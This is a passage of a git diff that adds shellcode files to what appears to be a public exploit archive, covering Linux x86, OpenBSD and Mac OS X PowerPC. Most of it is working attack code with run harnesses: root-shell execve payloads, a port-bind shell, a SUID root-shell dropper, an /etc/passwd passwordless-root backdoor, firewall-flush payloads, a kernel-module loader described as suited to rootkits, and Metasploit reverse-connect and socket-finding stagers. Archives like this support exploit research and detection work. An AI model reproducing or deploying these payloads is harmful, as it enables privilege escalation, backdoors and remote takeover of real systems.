Date: 23/06/2009" + "\n[+] Author: TheWorm" + "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1); + (*(void (*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43652.c b/shellcodes/linux_x86/43652.c new file mode 100644 index 000000000..57bd0e561 --- /dev/null +++ b/shellcodes/linux_x86/43652.c @@ -0,0 +1,34 @@ +#include + +const char shellcode[]= + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx,%ebx + "\xcd\x80" // int $0x80 + + "\xb0\x2e" // mov $0x2e,%al + "\xcd\x80" // int $0x80 + + "\xb0\x0b" // mov $0xb,%al (So you'll get segfault if it's not able to +do the setuid(0). If you don't want this you can write "\x6a\x0b\x58" +instead of "\xb0\x0b", but the shellcode will be 1 byte longer + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main() +{ + printf ("\n[+] Linux/x86 setuid(0), setgid(0) & +execve(/bin/sh,[/bin/sh,NULL])" + "\n[+] Date: 23/06/2009" + "\n[+] Author: TheWorm" + "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1); + (*(void (*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43653.c b/shellcodes/linux_x86/43653.c new file mode 100644 index 000000000..14ebb0a5e --- /dev/null +++ b/shellcodes/linux_x86/43653.c @@ -0,0 +1,28 @@ +#include + +const char shellcode[]= + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 + "\x68\x73\x68\x75\x74" // push $0x74756873 + "\x68\x69\x6e\x2f\x2f" // push $0x2f2f6e69 + "\x68\x2f\x2f\x73\x62" // push $0x62732f2f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x6a\x30" // push $0x30 + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main() +{ + printf ("\n[+] Linux/x86 execve(/sbin/shutdown,/sbin/shutdown 0)" + "\n[+] Date: 11/07/2009" + "\n[+] Author: TheWorm" + "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1); + (*(void (*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43654.c b/shellcodes/linux_x86/43654.c new file mode 100644 index 000000000..33473cdf6 --- /dev/null +++ b/shellcodes/linux_x86/43654.c @@ -0,0 +1,25 @@ +#include + +const char shellcode[]= + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 + "\x68\x6e\x2f\x72\x65" // push $0x65722f6e + "\x68\x2f\x73\x62\x69" // push $0x6962732f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main() +{ + printf ("\n[+] Linux/x86 execve(/sbin/reboot,/sbin/reboot)" + "\n[+] Date: 11/07/2009" + "\n[+] Author: TheWorm" + "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1); + (*(void (*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43655.c b/shellcodes/linux_x86/43655.c new file mode 100644 index 000000000..e332eeab3 --- /dev/null +++ b/shellcodes/linux_x86/43655.c @@ -0,0 +1,25 @@ +#include + +const char shellcode[]= + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x66\x68\x6c\x74" // pushw $0x746c + "\x68\x6e\x2f\x68\x61" // push $0x61682f6e + "\x68\x2f\x73\x62\x69" // push $0x6962732f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main() +{ + printf ("\n[+] Linux/x86 execve(/sbin/halt,/sbin/halt)" + "\n[+] Date: 11/07/2009" + "\n[+] Author: TheWorm" + "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1); + (*(void (*)()) shellcode)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43656.c b/shellcodes/linux_x86/43656.c new file mode 100644 index 000000000..b31ea0bc7 --- /dev/null +++ b/shellcodes/linux_x86/43656.c @@ -0,0 +1,66 @@ +/* + * (linux/x86) portbind /bin/sh (port 64713) + * 83 bytes + * + * http://www.gonullyourself.org + * sToRm + */ + +char shellcode[] = + // <_start>: +"\x6a\x66" // push $0x66 +"\x58" // pop %eax +"\x31\xdb" // xor %ebx,%ebx +"\x53" // push %ebx +"\x43" // inc %ebx +"\x53" // push %ebx +"\x6a\x02" // push $0x2 +"\x89\xe1" // mov %esp,%ecx +"\xcd\x80" // int $0x80 +"\x31\xd2" // xor %edx,%edx +"\x52" // push %edx +"\x68\xff\x02\xfc\xc9" // push $0xc9fc02ff +"\x89\xe1" // mov %esp,%ecx +"\x6a\x10" // push $0x10 +"\x51" // push %ecx +"\x50" // push %eax +"\x89\xe1" // mov %esp,%ecx +"\x89\xc6" // mov %eax,%esi +"\x43" // inc %ebx +"\xb0\x66" // mov $0x66,%al +"\xcd\x80" // int $0x80 +"\xb0\x66" // mov $0x66,%al +"\x43" // inc %ebx +"\x43" // inc %ebx +"\xcd\x80" // int $0x80 +"\x50" // push %eax +"\x56" // push %esi +"\x89\xe1" // mov %esp,%ecx +"\x43" // inc %ebx +"\xb0\x66" // mov $0x66,%al +"\xcd\x80" // int $0x80 +"\x93" // xchg %eax,%ebx +"\x6a\x03" // push $0x3 +"\x59" // pop %ecx + // : +"\x49" // dec %ecx +"\x6a\x3f" // push $0x3f +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x75\xf8" // jne +"\xf7\xe1" // mul %ecx +"\x51" // push %ecx +"\x68\x2f\x2f\x73\x68" // push $0x68732f2f +"\x68\x2f\x62\x69\x6e" // push $0x6e69622f +"\x89\xe3" // mov %esp,%ebx +"\xb0\x0b" // mov $0xb,%al +"\xcd\x80" // int $0x80 +; + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43657.c b/shellcodes/linux_x86/43657.c new file mode 100644 index 000000000..5f8d1e7f5 --- /dev/null +++ b/shellcodes/linux_x86/43657.c @@ -0,0 +1,35 @@ +/* + * (linux/x86) setuid(0) & execve("/bin/sh",0,0) + * 28 bytes + * + * http://www.gonullyourself.org + * sToRm + * + * I made this, because http://www.milw0rm.com/shellcode/7115 felt the need + * to express his "superior" 28-byte shellcode in all caps. I wasn't able + * to beat his code, but it's no longer special. + */ + +char shellcode[] = + // <_start>: + "\x31\xdb" // xor %ebx,%ebx + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + "\xf7\xe3" // mul %ebx + "\xb0\x0b" // mov $0xb,%al + "\x31\xc9" // xor %ecx,%ecx + "\x51" // push %ecx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\xcd\x80" // int $0x80 +; + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43658.c b/shellcodes/linux_x86/43658.c new file mode 100644 index 000000000..02b79e85d --- /dev/null +++ b/shellcodes/linux_x86/43658.c @@ -0,0 +1,27 @@ +/* + * (linux/x86) execve("/bin/sh",0,0) + * 21 bytes + * + * http://www.gonullyourself.org + * sToRm + */ + +char shellcode[] = + // <_start> + "\x31\xc9" // xor %ecx,%ecx + "\xf7\xe1" // mul %ecx + "\x51" // push %ecx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\xb0\x0b" // mov $0xb,%al + "\xcd\x80" // int $0x80 +; + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43660.c b/shellcodes/linux_x86/43660.c new file mode 100644 index 000000000..8f9b687fd --- /dev/null +++ b/shellcodes/linux_x86/43660.c @@ -0,0 +1,67 @@ +/* + linux/x86 (shamelessly ripped from one of my unpublished exploits) +*/ +/* + fork()'s, does setreuid(0, 0); then execve()'s: + /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh" + + hence dropping a SUID root shell in /tmp. +*/ + +char shellc[] = +/* Shellcode to drop a SUID root shell in /tmp/sh. + Forgive the Intel syntax in the commenting, bored with AT&T syntax.. + */ + +/* main: if (fork()) goto exeunt; else goto carryon; */ +"\x29\xc0" /* sub ax, ax */ +"\xb0\x02" /* mov al, 2 */ +"\xcd\x80" /* int 0x80 */ +"\x85\xc0" /* test ax, ax */ +"\x75\x02" /* jnz exeunt */ +"\xeb\x05" /* jmp carryon */ + +/* exeunt: exit(x); */ +"\x29\xc0" /* sub ax, ax */ +"\x40" /* inc ax */ +"\xcd\x80" /* int 0x80 */ + +/* carryon: setreuid(0, 0); goto callz; */ +"\x29\xc0" /* sub ax, ax */ +"\x29\xdb" /* sub bx, bx */ +"\x29\xc9" /* sub cx, cx */ +"\xb0\x46" /* mov al, 0x46 */ +"\xcd\x80" /* int 0x80 */ +"\xeb\x2a" /* jmp callz */ + +/* start: execve() */ +"\x5e" /* pop si */ +"\x89\x76\x32" /* mov [bp+0x32], si */ +"\x8d\x5e\x08" /* lea bx, [bp+0x08] */ +"\x89\x5e\x36" /* mov [bp+0x36], bx */ +"\x8d\x5e\x0b" /* lea bx, [bp+0x0b] */ +"\x89\x5e\x3a" /* mov [bp+0x3a], bx */ +"\x29\xc0" /* sub ax, ax */ +"\x88\x46\x07" /* mov [bp+0x07], al */ +"\x88\x46\x0a" /* mov [bp+0x0a], al */ +"\x88\x46\x31" /* mov [bp+0x31], al */ +"\x89\x46\x3e" /* mov [bp+0x3e], ax */ +"\x87\xf3" /* xchg si, bx */ +"\xb0\x0b" /* mov al, 0x0b */ +"\x8d\x4b\x32" /* lea cx, [bp+di+0x32] */ +"\x8d\x53\x3e" /* lea dx, [bp+di+0x3e] */ +"\xcd\x80" /* int 0x80 */ + +/* callz: call start */ +"\xe8\xd1\xff\xff\xff" /* call start */ + +/* data - command to execve() */ +"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20\x63\x70\x20\x2f\x62\x69\x6e\x2f" +"\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x34" +"\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x68"; + +/** test out the shellcode **/ +main () +{ + void (*sc)() = (void *)shellc; sc(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43661.c b/shellcodes/linux_x86/43661.c new file mode 100644 index 000000000..24e298a38 --- /dev/null +++ b/shellcodes/linux_x86/43661.c @@ -0,0 +1,52 @@ + /* + * Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve shellcode. +(Linux x86) + * Author: Cody Tubbs (loophole of hhp). + * www.hhp-programming.net / pigspigs@yahoo.com + * 12/20/2000. + * + * F.U. to ph1x(ry4n). -From me and dxmd... + * [If I ripped this, show me the source... or better yet + * go barrow a shovel so you can dig up deeper shit.] + */ + +unsigned char hhpcode[] = +"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66" +"\xb9\x1c\x02\x80\x36\x03\x46\xe2\xfa\xea\xb8\x03\x03\x03\x2c\x61" +"\x6a\x6d\x2c\x70\x6b\x03\x7d\x03\x93\x93\x93\x93\x93\x93\x93\x93" +"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x7f\x79\x75\x76\x76\x77\x72" +"\x6e\x69\x68\x6d\x70\x76\x76\x72\x6e\x69\x64\x65\x60\x63\x5e\x58" +"\x58\x5e\x5d\x5d\x5e\x5c\x61\x64\x6e\x70\x78\xa5\xaf\xb1\xb5\xbf" +"\xbc\xc0\xc6\xc6\xc1\xc2\xbd\xbe\xb9\xbb\xb6\xac\xaa\xa0\x6d\x6f" +"\x66\x6a\x69\x64\x55\x26\x33\x4d\x54\x5d\x43\x38\x35\x46\x40\x63" +"\x60\x61\x55\x48\x49\x4d\x5d\x66\x6e\x6a\x64\x63\x59\x54\x63\x69" +"\x6f\x70\x7a\x7b\x77\x7b\x79\x75\x71\x6d\x72\x72\x70\x71\x72\x6d" +"\x72\x70\x70\x70\x79\x76\x6c\x6d\x6f\x6e\x68\x70\x75\x6e\x65\x65" +"\x69\x68\x72\x75\x7d\x7f\x7e\x7d\x7f\x79\x78\x78\x7e\x79\x7e\x7d" +"\x7f\x74\x75\x77\x70\x75\x79\x7f\x78\x7a\x75\x71\x73\x72\x09\x03" +"\x2c\x67\x66\x75\x2c\x67\x70\x73\x03\x82\xef\x64\x28\x03\x03\x8a" +"\xf5\x56\x8a\xe6\x80\xef\x1f\x54\x55\x50\xeb\x03\x03\x03\x03\x58" +"\x82\xc0\xb9\x12\x03\x03\xc4\x46\xfb\x03\x03\x03\x03\xc4\x46\xff" +"\x03\x03\x03\x03\x8e\x80\x76\xee\xfc\xfc\x8a\x46\xfb\x8e\xb8\x7e" +"\xee\xfc\xfc\x8e\x90\x93\xee\xfc\xfc\x8a\x56\xeb\x8e\x88\x24\xed" +"\xfc\xfc\x8a\xcd\xbb\x06\x03\x03\x03\xba\x02\x03\x03\x03\xb9\x83" +"\x02\x03\x03\x50\x8a\xf0\xce\x83\x8a\x46\xf7\xbb\x2a\x03\x03\x03" +"\x88\x76\xf7\x50\x8a\xf0\xce\x83\x8a\x46\xe7\xbb\x07\x03\x03\x03" +"\x88\x76\xe7\x88\x4e\xeb\xb9\x95\x03\x03\x03\x50\x8a\xf0\xce\x83" +"\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce\x83\xc4\x46\xf3\x03\x03\x03" +"\x03\xbb\x07\x03\x03\x03\x88\x76\xe7\x8a\xfa\xb9\x02\x03\x03\x03" +"\x50\x8a\xf0\xce\x83\xfc\x46\xf3\x82\x7e\xf3\x54\x01\x03\x03\x7d" +"\xe3\xbb\x07\x03\x03\x03\x88\x4e\xeb\xb9\x95\x03\x03\x03\x50\x8a" +"\xf0\xce\x83\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce\x83\xc4\x46\xf3" +"\x03\x03\x03\x03\x93\xbb\x07\x03\x03\x03\x88\x76\xe7\x8a\xfa\xb9" +"\x02\x03\x03\x03\x50\x8a\xf0\xce\x83\xfc\x46\xf3\x82\x7e\xf3\x54" +"\x01\x03\x03\x7d\xe3\xbb\x07\x03\x03\x03\x88\x4e\xeb\xb9\x95\x03" +"\x03\x03\x50\x8a\xf0\xce\x83\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce" +"\x83\xbb\x05\x03\x03\x03\x50\x8a\xf0\xce\x83\xbb\x05\x03\x03\x03" +"\x88\x76\xf7\x50\x8a\xf0\xce\x83\xbb\x45\x03\x03\x03\x32\xf5\x32" +"\xca\x50\x8a\xf0\xce\x83\x8e\x7e\xfb\xbb\x08\x03\x03\x03\x88\x76" +"\xfb\x8a\xfa\x32\xd1\x50\x8a\xf0\xce\x83\x32\xc3\x8e\x66\xdb\x58" +"\x5d\x5c\xca\xc0\x93\x69"; + +typedef void (*F)(); +main(){F a;a=(F)(&hhpcode);a();} \ No newline at end of file diff --git a/shellcodes/linux_x86/43662.c b/shellcodes/linux_x86/43662.c new file mode 100644 index 000000000..ff4f69505 --- /dev/null +++ b/shellcodes/linux_x86/43662.c @@ -0,0 +1,39 @@ +Linux x86 shellcode that uses execve and echo >> to create a passwordless +root account. + + +Author: zillion +Email : zillion@safemode.org +Homepage: safemode.org +File: w000t-shell.c + + + +/* + * This shellcode will add a passwordless local root account 'w000t' + * Written by zillion@safemode.org + * + * Why so big ? it uses execve ;-) + */ + +char shellcode[]= + "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89" + "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89" + "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8" + "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23" + "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74" + "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a" + "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68" + "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" + "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44" + "\x44\x44"; + + + +int main() +{ + + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43663.c b/shellcodes/linux_x86/43663.c new file mode 100644 index 000000000..68986c24c --- /dev/null +++ b/shellcodes/linux_x86/43663.c @@ -0,0 +1,32 @@ +Author: zillion +Email: zillion@safemode.org +Homepage: http://www.safemode.org + + +Linux x86 shell code that does an execve of /sbin/ipchains -F + + +File name: flush-ipchains-shellcode.c + + +/* + * This shellcode will do /sbin/ipchains -F + * Written by zillion@safemode.org + * + */ + +char shellcode[]= + "\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d" + "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12" + "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e" + "\x2f\x69\x70\x63\x68\x61\x69\x6e\x73\x38\x2d\x46\x32\x33\x34" + "\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65"; + + +int main() +{ + + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/43664.c b/shellcodes/linux_x86/43664.c new file mode 100644 index 000000000..a2c2f0990 --- /dev/null +++ b/shellcodes/linux_x86/43664.c @@ -0,0 +1,31 @@ +Author: zillion +Email: zillion@safemode.org +Home: http://www.safemode.org + +Linux x86 shellcode that does an execve() of /sbin/iptables -F in order to +flush activated firewall rules. + + +File: flush-iptables-shell.c + +/* + * This shellcode will do /sbin/iptables -F + * Written by zillion@safemode.org + * + */ + +char shellcode[]= + "\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d" + "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12" + "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e" + "\x2f\x69\x70\x74\x61\x62\x6c\x65\x73\x38\x2d\x46\x32\x33\x34" + "\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65"; + + +int main() +{ + + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} \ No newline at end of file diff --git a/shellcodes/openbsd_x86/43633.c b/shellcodes/openbsd_x86/43633.c new file mode 100644 index 000000000..489575140 --- /dev/null +++ b/shellcodes/openbsd_x86/43633.c @@ -0,0 +1,53 @@ +/* The modload shellcode + loads /tmp/o.o module + very usefull if you have rootkit as kernel module in the /tmp dir + and you can easily change the path directly in the code + + Size 66 bytes + OS OpenBSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + +BITS 32 + +jmp short callme +main: + pop esi + xor eax,eax + push eax + push long 0x68732f6e + push long 0x69622f2f + mov ebx,esp + push eax + push word 0x632d + mov edi,esp + push eax + push esi + push edi + push ebx + mov edi,esp + push eax + push edi + push ebx + push eax + mov al,0x3B + int 0x80 +callme: + call main + db '/sbin/modload /tmp/o.o' +*/ + +char shellcode[] = + "\xeb\x25\x59\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" + "\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89" + "\xe7\x50\x57\x53\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff\x2f" + "\x73\x62\x69\x6e\x2f\x6d\x6f\x64\x6c\x6f\x61\x64\x20" + "\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f"; // "/tmp/o.o" < +#include +#include + + + +char shellcode[]= "\x31\xC0" // xor eax,eax + "\x50" // push eax + "\x68\x2F\x2F\x73\x68" // push dword + "\x68\x2F\x62\x69\x6E" // push dword + "\x89\xE3" // mov ebx,esp + "\x50\x50\x53" // push eax, push eax, push ebx + "\xB0\x3B" // mov al,0x3b + "\x6A\x2A" // push byte 0x2a + "\xCD\x80" // int 0x80 + + +int main(int argc, char *argv[]){ +void (*f)(); +char *x = malloc(sizeof(shellcode)); +memcpy(x, shellcode, sizeof(shellcode)); +f = (void (*)()) x; +f(); +} \ No newline at end of file diff --git a/shellcodes/osx_ppc/43610.c b/shellcodes/osx_ppc/43610.c new file mode 100644 index 000000000..70e4e9f80 --- /dev/null +++ b/shellcodes/osx_ppc/43610.c @@ -0,0 +1,106 @@ +;;; +;;; PowerPC OSX remote findsock by recv() key shellcode +;;; +;;; Dino Dai Zovi < ddz@theta44.org >, 20040816 +;;; + +.globl _shellcode +.text + +.set KEY, 0x5858580a +.set PTHREAD_EXIT, 0x90017021 ; OSX 10.3.X + +_shellcode: +Lfindsock: + addis r27, 0, hi16(KEY) + ori r27, r27, lo16(KEY) + addis r31, 0, hi16(0xffff0000) + srawi r31, r31, 11 + mtctr r31 + + ;; Count down sockets backwards in hopes of getting our most recent + ;; connection (if we have multiple). +L0: mfctr r3 + addi r3, r3, -1 ; r3 = socket file descriptor + + addi r4, r1, -4 ; r4 = stack buffer + sub r5, r1, r4 ; r5 = 4 + li r6, 0x4140 + srawi r6, r6, 7 ; r6 = MSG_PEEK | MSG_DONTWAIT + addi r7, r5, -4 ; r7 = 0 + addi r8, r5, -4 ; r8 = 0 + li r30, 0x3aff + srawi r0, r30, 9 ; load syscall number into r0 + cmplw r29, r29 + + .long 0x44ffff02 ; recvfrom(s, buf, 4, 0x82, 0, 0) + bdnzt eq, L0 + ;; On syscall error, attempt compare anyway and loop + + lwz r28, -4(r1) + cmplw r28, r27 + bdnzf eq, L0 + ;;; At this point our socket fd is in ctr + +;;; +;;; dup2(2) our socket (in ctr) to stdin, stdout, stderr +;;; +Ldup_fds: + li r30, 0x2d01 + srawi r0, r30, 7 + li r30, 0x666 + srawi r30, r30, 9 + + mfctr r3 + addi r4, r30, -1 + .long 0x44ffff02 ; dup2(sock, 2) + .long 0x7c842008 + + mfctr r3 + addi r4, r30, -2 + .long 0x44ffff02 ; dup2(sock, 1) + .long 0x7c842008 + + mfctr r3 + addi r4, r30, -3 + .long 0x44ffff02 ; dup2(sock, 0) + .long 0x7c842008 + +;;; +;;; VForking shellcode - Call vfork() and execute /bin/sh in child process. +;;; In parent, we exec "/bin/si" ("/bin/sh" + 1), fail, and run the code that +;;; follows the execve(). +;;; +Lfork_execve_binsh: + ;; call vfork (necessary to exec in threaded programs) + li r30, 0x42ff + srawi r0, r30, 8 + .long 0x44ffff02 + .long 0x7c842008 + + xor r31, r31, r31 + lis r30, 0x2f2f + addi r30, r30, 0x7367 + add r30, r30, r4 ; In child, $r4 should be zero + lis r29, 0x2f62 + addi r29, r29, 0x696e + xor r28, r28, r28 + addi r27, r1, -12 + stmw r27, -12(r1) ; -12 is arbitrary null-eliding constant + + addi r4, r1, -12 + addi r3, r1, -4 + xor r5, r5, r5 + li r30, 30209 + srawi r0, r30, 9 ; r0 = 59 + .long 0x44ffff02 ; execve(path, argv, NULL) +Lparent: + +;;; +;;; Call pthread_exit in parent process +;;; +Lpthexit: + addis r31, 0, hi16(PTHREAD_EXIT) ; pthread_exit + ori r31, r31, lo16(PTHREAD_EXIT) + mtctr r31 + bctrl \ No newline at end of file diff --git a/shellcodes/osx_ppc/43611.asm b/shellcodes/osx_ppc/43611.asm new file mode 100644 index 000000000..0a6fbdb83 --- /dev/null +++ b/shellcodes/osx_ppc/43611.asm @@ -0,0 +1,77 @@ +;; +; +; Name: single_reverse_tcp +; Qualities: Can Have Nulls +; Platforms: MacOS X / PPC +; Authors: H D Moore < hdm [at] metasploit.com > +; Version: $Revision: 1.1 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Connect back and spawn a shell +; +; +;; + +.globl _main +.text +_main: + ;; socket + li r3, 2 + li r4, 1 + li r5, 6 + li r0, 97 + sc + xor r0, r0, r0 + mr r30, r3 + + bl _connect + .long 0x00022211 + .long 0x7f000001 + +_connect: + mflr r4 + li r5, 0x10 + li r0, 98 + mr r3, r30 + sc + xor. r5, r5, r5 + +_setup_dup2: + li r5, 2 + +_dup2: + li r0, 90 + mr r3, r30 + mr r4, r5 + sc + xor r0, r0, r0 + subi r5, r5, 1 + cmpwi r5, -1 + bnel _dup2 + +_fork: + li r0, 2 + sc + xor. r5, r5, r5 + +_execsh: + xor. r5, r5, r5 + bnel _execsh + mflr r3 + addi r3, r3, 28 + stw r3, -8(r1) ; argv[0] = path + stw r5, -4(r1) ; argv[1] = NULL + subi r4, r1, 8 ; r4 = {path, 0} + li r0, 59 + sc ; execve(path, argv, NULL) + +; csh removes the need for setuid() +path: + .ascii "/bin/csh" + .long 0x00414243 \ No newline at end of file diff --git a/shellcodes/osx_ppc/43612.asm b/shellcodes/osx_ppc/43612.asm new file mode 100644 index 000000000..65b13eb84 --- /dev/null +++ b/shellcodes/osx_ppc/43612.asm @@ -0,0 +1,52 @@ +;; +; +; Name: stager_sock_find_peek +; Qualities: Null-Free +; Platforms: MacOS X / PPC +; Authors: H D Moore < hdm [at] metasploit.com > +; Version: $Revision: 1.1 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; This payload will recv() downward until the read +; data contains the search tag (0xXXXX1337). Once the +; tag is located, it will jump into the payload. The +; recv() call is passed the MSG_PEEK flag, the stage +; will need to flush the recv() queue before doing +; something like dup2'ing a shell. +; +;; + +.globl _main +.text +_main: + li r29, 0xfff + li r30, 0xfff + addic. r28, r29, -0xfff +1 + +findsock: + subf. r30, r28, r30 + blt _main + + subi r0, r29, 0xfff - 102 + mr r3, r30 + subi r4, r1, 4104 + li r5, 4095 + subi r6, r29, 0xfff - 0x82 + .long 0x44ffff02 + xor. r6, r6, r6 + + lhz r27, -4104(r1) + cmpwi r27, 0x1337 + bne findsock + +gotsock: + subi r4, r1, 4100 + mtctr r4 + blectr + xor. r6, r6, r6 \ No newline at end of file diff --git a/shellcodes/osx_ppc/43613.asm b/shellcodes/osx_ppc/43613.asm new file mode 100644 index 000000000..800018812 --- /dev/null +++ b/shellcodes/osx_ppc/43613.asm @@ -0,0 +1,49 @@ +;; +; +; Name: stager_sock_find +; Qualities: Can Have Nulls +; Platforms: MacOS X / PPC +; Authors: H D Moore < hdm [at] metasploit.com > +; Version: $Revision: 1.1 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; This payload will recv() downward until the read +; data contains the search tag (0xXXXX1337). Once the +; tag is located, it will jump into the payload. +; +;; + +.globl _main +.text +_main: + li r29, 0xfff + li r30, 0xfff + addic. r28, r29, -0xfff +1 + +findsock: + subf. r30, r28, r30 + blt _main + + subi r0, r29, 0xfff - 102 + mr r3, r30 + subi r4, r1, 4104 + li r5, 4095 + subi r6, r29, 0xfff - 0x80 + .long 0x44ffff02 + xor. r6, r6, r6 + + lhz r27, -4104(r1) + cmpwi r27, 0x1337 + bne findsock + +gotsock: + subi r4, r1, 4100 + mtctr r4 + blectr + xor. r6, r6, r6 \ No newline at end of file diff --git a/shellcodes/osx_ppc/43614.asm b/shellcodes/osx_ppc/43614.asm new file mode 100644 index 000000000..1fc34d481 --- /dev/null +++ b/shellcodes/osx_ppc/43614.asm @@ -0,0 +1,76 @@ +;; +; +; Name: stager_sock_reverse_nf.asm +; Qualities: Null-Free +; Platforms: MacOS X / PPC +; Authors: H D Moore < hdm [at] metasploit.com > +; Version: $Revision: 1.1 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Connects back, reads 8192 bytes, jumps into payload. +; Socket descriptor is left in r30. +; +;; + + +.globl _main +.text +_main: + +_socket: + li r27, 0x3030 + 97 + subi r0, r27, 0x3030 + 97 - 97 + subi r3, r27, 0x3030 + 97 - 2 + subi r4, r27, 0x3030 + 97 - 1 + subi r5, r27, 0x3030 + 97 - 6 + + .long 0x44ffff02 + xor r5, r5, r5 + mr r30, r3 + +_storeaddr: + + ; port - patch the xor word + li r25, (0x2211^0x4142) + xori r25, r25, 0x4142 + subi r29, r27, 0x3030 + 97 - 2 + slwi r29, r29, 16 + or r29, r29, 